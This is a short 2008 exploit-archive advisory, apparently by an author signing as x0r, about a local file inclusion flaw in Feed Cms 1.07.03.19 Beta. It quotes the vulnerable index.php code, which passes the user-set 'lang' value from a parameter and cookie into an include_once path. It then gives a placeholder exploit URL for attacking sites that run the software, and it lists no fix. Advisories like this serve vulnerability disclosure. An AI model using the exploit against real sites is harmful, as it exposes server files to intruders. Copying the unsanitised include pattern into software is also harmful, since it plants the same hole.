Feed Cms 1.07.03.19b (lang) Local File Inclusion Vulnerability

2008-12-11 20:30:04

###############################
Feed Cms 1.07.03.19 Beta LFI
###############################
Autore: x0r
Email: [email protected]
Download:
http://heanet.dl.sourceforge.net/sourceforge/feedcms/FeedCms1.07.03.19Beta.rar
###############################
Bug In: index.php

if ($_GET['lang'])
{
$language = $_GET['lang'];

setcookie('firstlang',$language,time()+3600*240*365);
header('location:'.$redirect);
}
$lang = $_COOKIE['firstlang'] ? $_COOKIE['firstlang'] : $lang;
include_once($FeedCms_Dir."lang/$lang/$lang.php");

LFI By Cookie ^ ^

Exploit:

http://[site]/FeedCms/?lang=[LFI] ^ ^

Greetz: A Te Che Mi Hai Cambiato La Vita...

#

Fixes

No fixes

In order to submit a new fix you need to be registered.